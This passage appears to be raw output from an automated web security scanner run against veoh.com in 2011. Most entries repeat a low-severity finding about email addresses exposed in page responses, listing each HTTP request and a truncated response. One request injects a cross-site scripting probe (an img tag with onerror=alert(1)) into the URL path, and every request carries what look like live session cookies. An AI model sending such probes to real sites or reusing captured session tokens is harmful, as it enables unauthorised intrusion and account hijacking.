HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:12 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=92 Content-Length: 133874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZC HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:53 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=71 Content-Length: 133874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekA HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:25 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=89 Content-Length: 133874
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:29 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=86 Content-Length: 134506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=46 Content-Length: 134905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:15 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 134399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:42 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=87 Content-Length: 134852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmS HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:57 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=92 Content-Length: 134505
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQz HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:18 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=6 Content-Length: 132755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:33 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/animation/watch/v20767083WdnCj7gW HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:36 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=89 Content-Length: 132878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:21 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=94 Content-Length: 140850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:34 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=30 Content-Length: 142204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
